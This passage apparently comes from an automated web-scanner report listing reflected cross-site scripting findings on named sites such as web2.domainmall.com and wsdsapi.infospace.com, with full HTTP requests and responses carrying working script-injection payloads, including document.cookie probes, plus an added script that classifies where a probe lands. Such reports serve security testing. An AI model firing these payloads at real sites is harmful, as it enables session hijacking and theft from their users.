Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6692
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:40 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
ace(/!~!click!~!/g,'');
else
_strContentTHD1293044987106 = _strContentTHD1293044987106.replace(/!~!click!~!/g,'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?c0b22'-alert(1)-'7388b2ddfcf');
}
else
{
_strContentTHD1293044987106 = '<a target="_blank" href="http://REDACTED.com/go/284152846/direct;ai.196212142;ct.1/01/" onclick="if(\'http://a1.interclick.com/icaid/122759/tid/756d9
...[SNIP]...

4.54. http://REDACTED/284152846/direct/01 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecb45'-alert(1)-'36c4d6a038a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&ecb45'-alert(1)-'36c4d6a038a=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6707
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:45 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
ce(/!~!click!~!/g,'');
else
_strContentTHD1293044987106 = _strContentTHD1293044987106.replace(/!~!click!~!/g,'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&ecb45'-alert(1)-'36c4d6a038a=1');
}
else
{
_strContentTHD1293044987106 = '<a target="_blank" href="http://REDACTED.com/go/284152846/direct;ai.196212142;ct.1/01/" onclick="if(\'http://a1.interclick.com/icaid/122759/tid/756
...[SNIP]...

4.55. http://REDACTED/284152846/direct/01 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f836"><script>alert(1)</script>c59229a215b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&4f836"><script>alert(1)</script>c59229a215b=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6782
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:44 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
<a target="_blank" href="http://REDACTED.com/go/284152846/direct;ai.196212142;ct.1/01/" onclick="if(\'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&4f836"><script>alert(1)</script>c59229a215b=1\')(new Image).src=\'http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&4f836">
...[SNIP]...

4.56. http://REDACTED/284152846/direct/01 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /284152846/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14fa6"-alert(1)-"b006579a593 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /284152846/direct/01?click=http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&14fa6"-alert(1)-"b006579a593=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6707
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 19 Jan 2011 18:03:44 GMT

<html><head><title>728x90_35_thd_hs_windows_revised</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
>= nRequiredVersion);
}
}
}
detectPluginTHD1293044987106();
var _THD1293044987106_Instance =
{
click : "http://a1.interclick.com/icaid/122759/tid/756d9268-d021-4892-8c27-455f95b967cb/click.ic?&14fa6"-alert(1)-"b006579a593=1",
clickThruUrl: "http://REDACTED.com/go/284152846/direct;ai.196212142;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

4.57. http://web2.domainmall.com/domainserve/domainView [dn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into a JavaScript inline comment. The payload e35b9*/alert(1)//6ec7245ba5b was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView?dn=e35b9*/alert(1)//6ec7245ba5b HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:51 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=44629bb917943f5c30c4192d9464a313dab56ab4; path=/; expires=Wed, 19-Jan-2011 19:15:51 GMT
Content-Length: 31997
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
rn result[1];
}

function redirect() {

window.location = "http://www.google.com";
}

// channel: "sports",


/*var google_afd_request = {

client: "ca-dp-sphere_related_xml",
domain_name: "e35b9*/alert(1)//6ec7245ba5b.e35b9*/alert(1)//6ec7245ba5b",
s: "e35b9*/alert(1)//6ec7245ba5b.e35b9*/alert(1)//6ec7245ba5b",
hl: "en"
}*/


var google_afd_request = {
client: 'ca-dp-sphere_related_xml',
domain_name: "e35
...[SNIP]...

4.58. http://web2.domainmall.com/domainserve/domainView [dn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37b7"%3balert(1)//97f91a6f73c was submitted in the dn parameter. This input was echoed as f37b7";alert(1)//97f91a6f73c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView?dn=f37b7"%3balert(1)//97f91a6f73c HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:36 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=c0caa9ec1522c80f906fc7eb2fe5b51232878fd2; path=/; expires=Wed, 19-Jan-2011 19:15:36 GMT
Content-Length: 31997
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
nction also_click()
{

var success = function(){};
var failure = function(){};
var callback = {success:success,failure:failure};

var url = "/domainserve/domainClick?viewid=557127573&searchid=&dn=f37b7";alert(1)//97f91a6f73c.f37b7";alert(1)//97f91a6f73c&ajax=1";
var request = YAHOO.util.Connect.asyncRequest("GET", url, callback);
setTimeout(function(){},100);

}

function blocked(status)
{
var success = function(){};
...[SNIP]...

4.59. http://web2.domainmall.com/domainserve/domainView [dn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the HTML document as text between TITLE tags. The payload 6c6ee</title><script>alert(1)</script>4caa1df9615 was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=6c6ee</title><script>alert(1)</script>4caa1df9615 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:47 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=7b4e1c0a481e6b51a8e8953417964887f5cf6ab1; path=/; expires=Wed, 19-Jan-2011 19:15:47 GMT
Content-Length: 33089
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<title>6c6ee</title><script>alert(1)</script>4caa1df9615.6c6ee</title>
...[SNIP]...

4.60. http://web2.domainmall.com/domainserve/domainView [dn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the HTML document as plain text between tags. The payload 778ef<script>alert(1)</script>584f04eb84a was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=778ef<script>alert(1)</script>584f04eb84a HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:42 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=87c366042c8466e1129e73c4d834367a5e54d93a; path=/; expires=Wed, 19-Jan-2011 19:15:42 GMT
Content-Length: 32673
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
</script>584f04eb84a.778ef<script>alert(1)</script>584f04eb84a/domainserve/domainView?dn=778ef<script>
...[SNIP]...

4.61. http://web2.domainmall.com/domainserve/domainView [dn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eec5"><script>alert(1)</script>da4345821a9 was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=9eec5"><script>alert(1)</script>da4345821a9 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:30 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=bf9ad0a13d12e1c13476be8aa19fd921a11c014d; path=/; expires=Wed, 19-Jan-2011 19:15:30 GMT
Content-Length: 32777
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<meta name="description" content="Look no further for the best information on 9eec5"><script>alert(1)</script>da4345821a9.9eec5">
...[SNIP]...

4.62. http://web2.domainmall.com/domainserve/domainView [dn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c682d'><script>alert(1)</script>0eba87e9935 was submitted in the dn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainserve/domainView?dn=c682d'><script>alert(1)</script>0eba87e9935 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:33 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=19e337cb57bdd20b143e8c174e2bbda30121583e; path=/; expires=Wed, 19-Jan-2011 19:15:33 GMT
Content-Length: 32777
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<INPUT TYPE=HIDDEN NAME='dn' VALUE='c682d'><script>alert(1)</script>0eba87e9935.c682d'>
...[SNIP]...

4.63. http://web2.domainmall.com/domainserve/domainView [dn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The value of the dn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58025'%3balert(1)//1b423bdb38b was submitted in the dn parameter. This input was echoed as 58025';alert(1)//1b423bdb38b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domainserve/domainView?dn=58025'%3balert(1)//1b423bdb38b HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:39 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=020ac9983d95161f0d76c3fd16fc5b5fd4847907; path=/; expires=Wed, 19-Jan-2011 19:15:39 GMT
Content-Length: 31997
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">
var mobile_redirect_url = 'http://58025';alert(1)//1b423bdb38b.58025';alert(1)//1b423bdb38b/domainserve/domainView?dn=58025';alert(1)//1b423bdb38b.58025';alert(1)//1b423bdb38b&mobile=1';

if(undefined != mobile_redirect_url && navigator.userAgent.match(/(ip
...[SNIP]...
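Findings 4.59 to 4.63 show one unfiltered parameter, dn, landing in five different syntactic contexts of the same page: title text, a plain text node, a double-quoted attribute, a single-quoted attribute and a single-quoted JavaScript string. The context, not the mere fact of reflection, decides which payload shape executes, which is why the scanner used a different probe for each. The following script is an added example, not part of the scanner report or the site's code: it locates a probe in a response body and classifies the context it landed in, using the response fragments copied from the findings above as constructed input. The classifier is a heuristic of my own (it tracks quotes and comments but not regular-expression literals) and is not the scanner's logic.

```javascript
// Added example, not part of the scanner report or the site's code: re-check a
// reflected-XSS finding offline by locating the probe in the response body and
// classifying the syntactic context it landed in. The context decides which
// payload shape will execute: a closing </title> in title text, a bare
// <script> in a text node, a quote-break in an attribute, a quote plus ';' or
// '-' inside a JavaScript string literal.
'use strict';

// Lex the JavaScript that precedes the probe and report whether it ends inside
// a string literal. Heuristic: comments and the three string delimiters are
// tracked, regular-expression literals are not.
function jsStringState(code) {
  let state = 'code';
  for (let i = 0; i < code.length; i++) {
    const c = code[i], n = code[i + 1];
    if (state === 'code') {
      if (c === '"' || c === "'" || c === '`') state = c;
      else if (c === '/' && n === '/') state = 'line-comment';
      else if (c === '/' && n === '*') { state = 'block-comment'; i++; }
    } else if (state === 'line-comment') {
      if (c === '\n') state = 'code';
    } else if (state === 'block-comment') {
      if (c === '*' && n === '/') { state = 'code'; i++; }
    } else if (c === '\\') {
      i++;                                  // inside a string: skip the escaped character
    } else if (c === state) {
      state = 'code';                       // closing delimiter of the string
    }
  }
  return { '"': 'string-double', "'": 'string-single', '`': 'template' }[state] || state;
}

// Inside a start tag: return the quote character of an unterminated attribute
// value, or null when the cursor is not inside a quoted value.
function attrQuoteState(tag) {
  let quote = null;
  for (const c of tag) {
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
  }
  return quote;
}

// Classify the position at the end of `prefix` (everything before the probe).
function classifyContext(prefix) {
  const lower = prefix.toLowerCase();
  const openScript = lower.lastIndexOf('<script');
  if (openScript > lower.lastIndexOf('</script')) {
    const tagEnd = prefix.indexOf('>', openScript);
    if (tagEnd !== -1) return 'js-' + jsStringState(prefix.slice(tagEnd + 1));
  }
  if (prefix.lastIndexOf('<') > prefix.lastIndexOf('>')) {
    const q = attrQuoteState(prefix.slice(prefix.lastIndexOf('<')));
    return q === '"' ? 'html-attr-double' : q === "'" ? 'html-attr-single' : 'html-tag';
  }
  if (lower.lastIndexOf('<title') > lower.lastIndexOf('</title')) return 'html-title-text';
  return 'html-text';
}

// Locate the probe exactly as sent; null means it was not echoed unmodified
// (encoded or altered reflections need a separate check).
function findReflection(body, probe) {
  const index = body.indexOf(probe);
  if (index === -1) return null;
  return { index, context: classifyContext(body.slice(0, index)) };
}

// Constructed input: response fragments copied from findings 4.59 to 4.63
// (the <script> opener for 4.63 is the one shown in that response).
const SAMPLES = {
  '4.59': { probe: '6c6ee</title><script>alert(1)</script>4caa1df9615',
            body: '<title>6c6ee</title><script>alert(1)</script>4caa1df9615.6c6ee</title>' },
  '4.60': { probe: '778ef<script>alert(1)</script>584f04eb84a',
            body: '</script>584f04eb84a.778ef<script>alert(1)</script>584f04eb84a/domainserve/domainView?dn=778ef<script>' },
  '4.61': { probe: '9eec5"><script>alert(1)</script>da4345821a9',
            body: '<meta name="description" content="Look no further for the best information on 9eec5"><script>alert(1)</script>da4345821a9.9eec5">' },
  '4.62': { probe: "c682d'><script>alert(1)</script>0eba87e9935",
            body: "<INPUT TYPE=HIDDEN NAME='dn' VALUE='c682d'><script>alert(1)</script>0eba87e9935.c682d'>" },
  '4.63': { probe: "58025';alert(1)//1b423bdb38b",
            body: '<script type="text/javascript">\nvar mobile_redirect_url = \'http://58025\';alert(1)//1b423bdb38b.58025\';alert(1)//1b423bdb38b&mobile=1\';' },
};

// Map each finding to the context its probe landed in.
function checkSamples(samples = SAMPLES) {
  const out = {};
  for (const [id, { probe, body }] of Object.entries(samples)) {
    const hit = findReflection(body, probe);
    out[id] = hit ? hit.context : 'not reflected unmodified';
  }
  return out;
}

console.log(checkSamples());
```

Run against the five fragments the script reports html-title-text, html-text, html-attr-double, html-attr-single and js-string-single, matching the scanner's five issue descriptions. A probe that is reflected only in encoded form returns null from findReflection, which is the case to re-test by hand before closing a finding as not exploitable.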

4.64. http://wsdsapi.infospace.com/infomaster/widgets [qkwid1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ce31'%3balert(1)//60c9f7c43e2 was submitted in the qkwid1 parameter. This input was echoed as 9ce31';alert(1)//60c9f7c43e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw9ce31'%3balert(1)//60c9f7c43e2&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 18:05:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=JKxkv-1aEVJK8TrSC4zgrQyPUpVDdgrvFeBW_v_PrzKceW2yOCkLgBgwdHFbvPr5OpaQtvJ8YPTHfWwl4GWV3GhNrCJKk3Nl0myqcNWKrXVq5G5_rodzQnjJpPDrhKsD-0vXup1i6MsTcSZ86sm0EOic86poPiPwQoyKxoESCLH3ieUQ0; expires=Fri, 14-Dec-2012 04:45:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=33jktje1lyprzd454fe1zryz; path=/
Set-Cookie: DomainSession=TransactionId=1fc361942a8747448838c7deaeb7cb01&SessionId=ffd2a4e5c674424ba5e0c7deaeb7cb01&ActionId=2859ad8491b34b9aa416c7deaeb7cb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Wed, 19-Jan-2011 18:25:10 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=fb3233944f2346679663c7deaeb7cb01&LastSeenDateTime=1/19/2011 6:05:10 PM&IssueDateTime=1/19/2011 6:05:10 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Fri, 26-Dec-2110 18:05:10 GMT; path=/
Cache-Control: public
Expires: Wed, 19 Jan 2011 19:05:10 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


                                   // variable contructors
var txtElements = [{txt:'qkw9ce31';alert(1)//60c9f7c43e2',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw9ce31';alert(1)//60c9f7c43e2');input1.setAttribute('autocomplete','off');

function JSONscr
...[SNIP]...

4.65. http://wsdsapi.infospace.com/infomaster/widgets [submitid1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9b6d'%3balert(1)//dd5166876a6 was submitted in the submitid1 parameter. This input was echoed as c9b6d';alert(1)//dd5166876a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkwc9b6d'%3balert(1)//dd5166876a6 HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 18:05:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=jNwawCmwO3s_WpmcrASVP4lAUo6C6z8GBAEXjg_f4A_72l8_zJqRCVQOO1kQh8lTTGZ7_nhSxJV-XZecIGydZ0HQE-T2rDbh3PSAWMeulwhCECSL6Smxm2zkGUgmhrjBO5wpjFWq99w-JHdJ-4hvtE31NWhJLe40EudQkHkfoV-yXj9m0; expires=Fri, 14-Dec-2012 04:45:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2rci3t45uzkm0zeix2axfwv5; path=/
Set-Cookie: DomainSession=TransactionId=95cc2984d7be46e88ab5c7deaeb7cb01&SessionId=a968626e22924540b9cec7deaeb7cb01&ActionId=51d4497b031f4c5fa60dc7deaeb7cb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Wed, 19-Jan-2011 18:25:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=cd3692fcd30a4459b987c7deaeb7cb01&LastSeenDateTime=1/19/2011 6:05:12 PM&IssueDateTime=1/19/2011 6:05:12 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Fri, 26-Dec-2110 18:05:12 GMT; path=/
Cache-Control: public
Expires: Wed, 19 Jan 2011 19:05:12 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


